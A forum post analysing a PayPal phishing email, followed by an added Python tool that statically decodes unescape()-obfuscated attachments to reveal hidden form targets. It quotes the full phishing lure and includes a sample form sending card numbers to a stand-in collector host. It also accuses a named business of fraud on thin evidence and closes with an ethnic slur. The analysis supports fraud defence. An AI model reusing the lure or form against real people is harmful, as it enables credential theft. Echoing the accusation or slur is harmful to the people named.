
Author Topic: Paypal fraud: Including full back check.  (Read 5626 times)


Paypal fraud: Including full back check.
« on: March 12, 2014, 08:31:13 PM »

I received this spam email in my mailbox.
And I was like, uhm, this is fake.
Code:
Dear PayPal Customer,

On March 11, 2014, We recently have determined that different computers have logged in your PayPal account.

And multiple password failures were present before the logo's. We now need you to re-confirm your account information to us.
If this is not completed by 15-03-2014, we will be forced to suspend your account indefinitely.

Case ID Number : PP-001-544-591

To restore your account,

Please download the attached form to verify your Profile information and restore your account access.

Make sure you enter the information accurately, and according to the formats required.
Fill in all the required fields.

It's usually pretty easy to take care of things like this. Most of the
time, we just need a little more information about your account or latest

To help us with this and to see what you can and can't do with your account
until the issue is resolved, log in to your account and go to the
Resolution Center.

Yours sincerely,

Help Center:
Security Center:

Please do not reply to this email because we are not monitoring this inbox. To get in touch with us, log in to your account and click "Contact Us" at the bottom of any page.

Copyright © 2014 PayPal Inc. All rights reserved.

Consumer advisory: PayPal Pte Ltd, the Holder of the PayPal™ payment service stored value facility, does not require the approval of the Monetary Authority of Singapore. Consumers (users) are advised to read the terms and conditions: https://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/ua-outside carefully.
PayPal Email ID  PP076

This email contained an HTML file, which was encrypted with Unescape.

http://pastebin.com/zR20Ujs5 <- Encrypted unescape.

As we decrypt this, we will come out at:
http://pastebin.com/qhepQeAY <- decrypted output.

Well, that didn't turn out to be anything.
Let's go to the original email:
Code:
Received: from london254.server4you.net (london254.server4you.net. [])

Well, if we go to that IP address, we arrive at a Pakistani store, which is very sketchy.
Now time for some reverse IP lookup:
First domain: http://whois.domaintools.com/priceinlahore.com.pk
Check the green sentence: Reverse Whois: "Rupya" is associated with about 3 other domains.
After googling Rupya, I found their website: Rupya.pk
When I tried to google whether they were trustworthy, your site said they were: wrong.
Another proof: they are aware of email scraping.
They list an image with their email on their contact page, so it doesn't get scraped. Smart.

Give this site a rating of 0, it's full of scams.
Took me 10 mins to do this research.

GG Pakis.

« Last Edit: March 12, 2014, 08:44:03 PM by Krewella »
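
The unescape() decoding step described in the post, as an added example that is not part of the original post: it decodes the attachment's string literal statically, without running the script, and reports where the hidden form submits and which fields it asks for. It goes slightly beyond the post by also following nested unescape() layers and %uXXXX sequences; the function names and the sample attachment are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Captures the string literal passed to unescape('...') or unescape("...").
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
ESCAPE_SEQ = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

def js_unescape(s):
    """Static equivalent of JavaScript unescape() (%uXXXX and %XX); runs no script."""
    return ESCAPE_SEQ.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decoded_payloads(html, max_depth=5):
    """Decode every unescape() literal, following nested layers up to max_depth."""
    out, queue = [], [(html, 0)]
    while queue:
        text, depth = queue.pop()
        for m in UNESCAPE_CALL.finditer(text):
            out.append(js_unescape(m.group(2)))
            if depth < max_depth:
                queue.append((out[-1], depth + 1))
    return out

class FormFinder(HTMLParser):
    """Collects where forms submit to and which input fields they request."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and a.get("name"):
            self.fields.append(a["name"])

def triage(attachment_html):
    actions, fields = [], []
    for payload in decoded_payloads(attachment_html):
        finder = FormFinder()  # fresh parser per payload, so state never leaks
        finder.feed(payload)
        actions += finder.actions
        fields += finder.fields
    hosts = sorted({urlparse(u).hostname or "(relative)" for u in actions})
    return {"post_hosts": hosts, "fields": fields}

# Constructed sample (not the attachment from the post): a form hidden in unescape().
SAMPLE = ("<script>document.write(unescape('%3Cform%20action%3D%22http%3A//collector.example/p%22%3E"
          "%3Cinput%20name%3D%22cardnumber%22%3E%3C/form%3E'));</script>")
if __name__ == "__main__":
    print(triage(SAMPLE))
```

A form that posts to a host unrelated to the claimed sender and asks for card or login fields is the indicator to look for in the output.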